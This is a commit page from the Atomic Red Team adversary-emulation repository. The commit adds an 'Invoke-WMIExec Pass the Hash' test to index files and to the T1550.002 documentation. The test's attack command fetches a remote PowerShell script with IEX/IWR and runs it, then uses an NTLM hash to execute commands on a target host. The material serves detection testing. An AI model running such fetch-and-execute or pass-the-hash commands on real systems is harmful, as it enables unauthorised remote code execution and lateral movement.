security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generated docs from job=generate-docs branch=master [ci skip]

Browse Source
This commit is contained in:
Atomic Red Team doc generator
2022-04-28 01:38:56 +00:00
parent 3b7d1a9d19
commit ab5e560865
6 changed files with 109 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/Indexes/Indexes-CSV/index.csv
+2
View File
@@ -572,6 +572,7 @@ defense-evasion,T1134.004,Parent PID Spoofing,4,Parent PID Spoofing - Spawn from
defense-evasion,T1134.004,Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell
defense-evasion,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
defense-evasion,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
defense-evasion,T1550.002,Pass the Hash,3,Invoke-WMIExec Pass the Hash,f8757545-b00a-4e4e-8cfb-8cfb961ee713,powershell
defense-evasion,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
defense-evasion,T1550.003,Pass the Ticket,2,Rubeus Kerberos Pass The Ticket,a2fc4ec5-12c6-4fb4-b661-961f23f359cb,powershell
defense-evasion,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
@@ -1079,6 +1080,7 @@ execution,T1047,Windows Management Instrumentation,10,Application uninstall usin
lateral-movement,T1021.003,Distributed Component Object Model,1,PowerShell Lateral Movement using MMC20,6dc74eb1-c9d6-4c53-b3b5-6f50ae339673,powershell
lateral-movement,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
lateral-movement,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
lateral-movement,T1550.002,Pass the Hash,3,Invoke-WMIExec Pass the Hash,f8757545-b00a-4e4e-8cfb-8cfb961ee713,powershell
lateral-movement,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
lateral-movement,T1550.003,Pass the Ticket,2,Rubeus Kerberos Pass The Ticket,a2fc4ec5-12c6-4fb4-b661-961f23f359cb,powershell
lateral-movement,T1563.002,RDP Hijacking,1,RDP hijacking,a37ac520-b911-458e-8aed-c5f1576d9f46,command_prompt
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
572 defense-evasion T1134.004 Parent PID Spoofing 5 Parent PID Spoofing - Spawn from New Process 2988133e-561c-4e42-a15f-6281e6a9b2db powershell
573 defense-evasion T1550.002 Pass the Hash 1 Mimikatz Pass the Hash ec23cef9-27d9-46e4-a68d-6f75f7b86908 command_prompt
574 defense-evasion T1550.002 Pass the Hash 2 crackmapexec Pass the Hash eb05b028-16c8-4ad8-adea-6f5b219da9a9 command_prompt
575 defense-evasion T1550.002 Pass the Hash 3 Invoke-WMIExec Pass the Hash f8757545-b00a-4e4e-8cfb-8cfb961ee713 powershell
576 defense-evasion T1550.003 Pass the Ticket 1 Mimikatz Kerberos Ticket Attack dbf38128-7ba7-4776-bedf-cc2eed432098 command_prompt
577 defense-evasion T1550.003 Pass the Ticket 2 Rubeus Kerberos Pass The Ticket a2fc4ec5-12c6-4fb4-b661-961f23f359cb powershell
578 defense-evasion T1556.002 Password Filter DLL 1 Install and Register Password Filter DLL a7961770-beb5-4134-9674-83d7e1fa865c powershell
1080 lateral-movement T1021.003 Distributed Component Object Model 1 PowerShell Lateral Movement using MMC20 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673 powershell
1081 lateral-movement T1550.002 Pass the Hash 1 Mimikatz Pass the Hash ec23cef9-27d9-46e4-a68d-6f75f7b86908 command_prompt
1082 lateral-movement T1550.002 Pass the Hash 2 crackmapexec Pass the Hash eb05b028-16c8-4ad8-adea-6f5b219da9a9 command_prompt
1083 lateral-movement T1550.002 Pass the Hash 3 Invoke-WMIExec Pass the Hash f8757545-b00a-4e4e-8cfb-8cfb961ee713 powershell
1084 lateral-movement T1550.003 Pass the Ticket 1 Mimikatz Kerberos Ticket Attack dbf38128-7ba7-4776-bedf-cc2eed432098 command_prompt
1085 lateral-movement T1550.003 Pass the Ticket 2 Rubeus Kerberos Pass The Ticket a2fc4ec5-12c6-4fb4-b661-961f23f359cb powershell
1086 lateral-movement T1563.002 RDP Hijacking 1 RDP hijacking a37ac520-b911-458e-8aed-c5f1576d9f46 command_prompt
atomics/Indexes/Indexes-CSV/windows-index.csv
+2
View File
@@ -398,6 +398,7 @@ defense-evasion,T1134.004,Parent PID Spoofing,4,Parent PID Spoofing - Spawn from
defense-evasion,T1134.004,Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell
defense-evasion,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
defense-evasion,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
defense-evasion,T1550.002,Pass the Hash,3,Invoke-WMIExec Pass the Hash,f8757545-b00a-4e4e-8cfb-8cfb961ee713,powershell
defense-evasion,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
defense-evasion,T1550.003,Pass the Ticket,2,Rubeus Kerberos Pass The Ticket,a2fc4ec5-12c6-4fb4-b661-961f23f359cb,powershell
defense-evasion,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
@@ -797,6 +798,7 @@ exfiltration,T1567,Exfiltration Over Web Service,1,Data Exfiltration with Config
lateral-movement,T1021.003,Distributed Component Object Model,1,PowerShell Lateral Movement using MMC20,6dc74eb1-c9d6-4c53-b3b5-6f50ae339673,powershell
lateral-movement,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
lateral-movement,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
lateral-movement,T1550.002,Pass the Hash,3,Invoke-WMIExec Pass the Hash,f8757545-b00a-4e4e-8cfb-8cfb961ee713,powershell
lateral-movement,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
lateral-movement,T1550.003,Pass the Ticket,2,Rubeus Kerberos Pass The Ticket,a2fc4ec5-12c6-4fb4-b661-961f23f359cb,powershell
lateral-movement,T1563.002,RDP Hijacking,1,RDP hijacking,a37ac520-b911-458e-8aed-c5f1576d9f46,command_prompt
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
398 defense-evasion T1134.004 Parent PID Spoofing 5 Parent PID Spoofing - Spawn from New Process 2988133e-561c-4e42-a15f-6281e6a9b2db powershell
399 defense-evasion T1550.002 Pass the Hash 1 Mimikatz Pass the Hash ec23cef9-27d9-46e4-a68d-6f75f7b86908 command_prompt
400 defense-evasion T1550.002 Pass the Hash 2 crackmapexec Pass the Hash eb05b028-16c8-4ad8-adea-6f5b219da9a9 command_prompt
401 defense-evasion T1550.002 Pass the Hash 3 Invoke-WMIExec Pass the Hash f8757545-b00a-4e4e-8cfb-8cfb961ee713 powershell
402 defense-evasion T1550.003 Pass the Ticket 1 Mimikatz Kerberos Ticket Attack dbf38128-7ba7-4776-bedf-cc2eed432098 command_prompt
403 defense-evasion T1550.003 Pass the Ticket 2 Rubeus Kerberos Pass The Ticket a2fc4ec5-12c6-4fb4-b661-961f23f359cb powershell
404 defense-evasion T1556.002 Password Filter DLL 1 Install and Register Password Filter DLL a7961770-beb5-4134-9674-83d7e1fa865c powershell
798 lateral-movement T1021.003 Distributed Component Object Model 1 PowerShell Lateral Movement using MMC20 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673 powershell
799 lateral-movement T1550.002 Pass the Hash 1 Mimikatz Pass the Hash ec23cef9-27d9-46e4-a68d-6f75f7b86908 command_prompt
800 lateral-movement T1550.002 Pass the Hash 2 crackmapexec Pass the Hash eb05b028-16c8-4ad8-adea-6f5b219da9a9 command_prompt
801 lateral-movement T1550.002 Pass the Hash 3 Invoke-WMIExec Pass the Hash f8757545-b00a-4e4e-8cfb-8cfb961ee713 powershell
802 lateral-movement T1550.003 Pass the Ticket 1 Mimikatz Kerberos Ticket Attack dbf38128-7ba7-4776-bedf-cc2eed432098 command_prompt
803 lateral-movement T1550.003 Pass the Ticket 2 Rubeus Kerberos Pass The Ticket a2fc4ec5-12c6-4fb4-b661-961f23f359cb powershell
804 lateral-movement T1563.002 RDP Hijacking 1 RDP hijacking a37ac520-b911-458e-8aed-c5f1576d9f46 command_prompt
atomics/Indexes/Indexes-Markdown/index.md
+2
View File
@@ -867,6 +867,7 @@
- [T1550.002 Pass the Hash](../../T1550.002/T1550.002.md)
- Atomic Test #1: Mimikatz Pass the Hash [windows]
- Atomic Test #2: crackmapexec Pass the Hash [windows]
- Atomic Test #3: Invoke-WMIExec Pass the Hash [windows]
- [T1550.003 Pass the Ticket](../../T1550.003/T1550.003.md)
- Atomic Test #1: Mimikatz Kerberos Ticket Attack [windows]
- Atomic Test #2: Rubeus Kerberos Pass The Ticket [windows]
@@ -1757,6 +1758,7 @@
- [T1550.002 Pass the Hash](../../T1550.002/T1550.002.md)
- Atomic Test #1: Mimikatz Pass the Hash [windows]
- Atomic Test #2: crackmapexec Pass the Hash [windows]
- Atomic Test #3: Invoke-WMIExec Pass the Hash [windows]
- [T1550.003 Pass the Ticket](../../T1550.003/T1550.003.md)
- Atomic Test #1: Mimikatz Kerberos Ticket Attack [windows]
- Atomic Test #2: Rubeus Kerberos Pass The Ticket [windows]
atomics/Indexes/Indexes-Markdown/windows-index.md
+2
View File
@@ -625,6 +625,7 @@
- [T1550.002 Pass the Hash](../../T1550.002/T1550.002.md)
- Atomic Test #1: Mimikatz Pass the Hash [windows]
- Atomic Test #2: crackmapexec Pass the Hash [windows]
- Atomic Test #3: Invoke-WMIExec Pass the Hash [windows]
- [T1550.003 Pass the Ticket](../../T1550.003/T1550.003.md)
- Atomic Test #1: Mimikatz Kerberos Ticket Attack [windows]
- Atomic Test #2: Rubeus Kerberos Pass The Ticket [windows]
@@ -1314,6 +1315,7 @@
- [T1550.002 Pass the Hash](../../T1550.002/T1550.002.md)
- Atomic Test #1: Mimikatz Pass the Hash [windows]
- Atomic Test #2: crackmapexec Pass the Hash [windows]
- Atomic Test #3: Invoke-WMIExec Pass the Hash [windows]
- [T1550.003 Pass the Ticket](../../T1550.003/T1550.003.md)
- Atomic Test #1: Mimikatz Kerberos Ticket Attack [windows]
- Atomic Test #2: Rubeus Kerberos Pass The Ticket [windows]
atomics/Indexes/index.yaml
+60
View File
@@ -35999,6 +35999,36 @@ defense-evasion:
executor:
command: "#{crackmapexec_exe} #{domain} -u #{user_name} -H #{ntlm} -x #{command}\n"
name: command_prompt
- name: Invoke-WMIExec Pass the Hash
auto_generated_guid: f8757545-b00a-4e4e-8cfb-8cfb961ee713
description: |-
Use Invoke-WMIExec to Pass the Hash
Note: must dump hashes first
[Reference](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth)
supported_platforms:
- windows
input_arguments:
ntlm:
description: ntlm hash
type: string
default: cc36cf7a8514893efccd3324464tkg1a
user_name:
description: username
type: string
default: Administrator
command:
description: Command to run on target system
type: string
default: hostname
target:
description: System to run command on
type: string
default: "$env:COMPUTERNAME"
executor:
command: |-
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://github.com/Kevin-Robertson/Invoke-TheHash/blob/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username #{user_name} -Hash #{ntlm} -Command #{command}
name: powershell
T1550.003:
technique:
object_marking_refs:
@@ -72169,6 +72199,36 @@ lateral-movement:
executor:
command: "#{crackmapexec_exe} #{domain} -u #{user_name} -H #{ntlm} -x #{command}\n"
name: command_prompt
- name: Invoke-WMIExec Pass the Hash
auto_generated_guid: f8757545-b00a-4e4e-8cfb-8cfb961ee713
description: |-
Use Invoke-WMIExec to Pass the Hash
Note: must dump hashes first
[Reference](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth)
supported_platforms:
- windows
input_arguments:
ntlm:
description: ntlm hash
type: string
default: cc36cf7a8514893efccd3324464tkg1a
user_name:
description: username
type: string
default: Administrator
command:
description: Command to run on target system
type: string
default: hostname
target:
description: System to run command on
type: string
default: "$env:COMPUTERNAME"
executor:
command: |-
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://github.com/Kevin-Robertson/Invoke-TheHash/blob/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username #{user_name} -Hash #{ntlm} -Command #{command}
name: powershell
T1550.003:
technique:
object_marking_refs:
atomics/T1550.002/T1550.002.md
+41
View File
@@ -12,6 +12,8 @@ Adversaries may also use stolen password hashes to "overpass the hash." Similar
- [Atomic Test #2 - crackmapexec Pass the Hash](#atomic-test-2---crackmapexec-pass-the-hash)
- [Atomic Test #3 - Invoke-WMIExec Pass the Hash](#atomic-test-3---invoke-wmiexec-pass-the-hash)
<br/>
@@ -116,4 +118,43 @@ Write-Host Automated installer not implemented yet, please install crackmapexec
<br/>
<br/>
## Atomic Test #3 - Invoke-WMIExec Pass the Hash
Use Invoke-WMIExec to Pass the Hash
Note: must dump hashes first
[Reference](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth)
**Supported Platforms:** Windows
**auto_generated_guid:** f8757545-b00a-4e4e-8cfb-8cfb961ee713
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| ntlm | ntlm hash | string | cc36cf7a8514893efccd3324464tkg1a|
| user_name | username | string | Administrator|
| command | Command to run on target system | string | hostname|
| target | System to run command on | string | $env:COMPUTERNAME|
#### Attack Commands: Run with `powershell`!
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://github.com/Kevin-Robertson/Invoke-TheHash/blob/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username #{user_name} -Hash #{ntlm} -Command #{command}
```
<br/>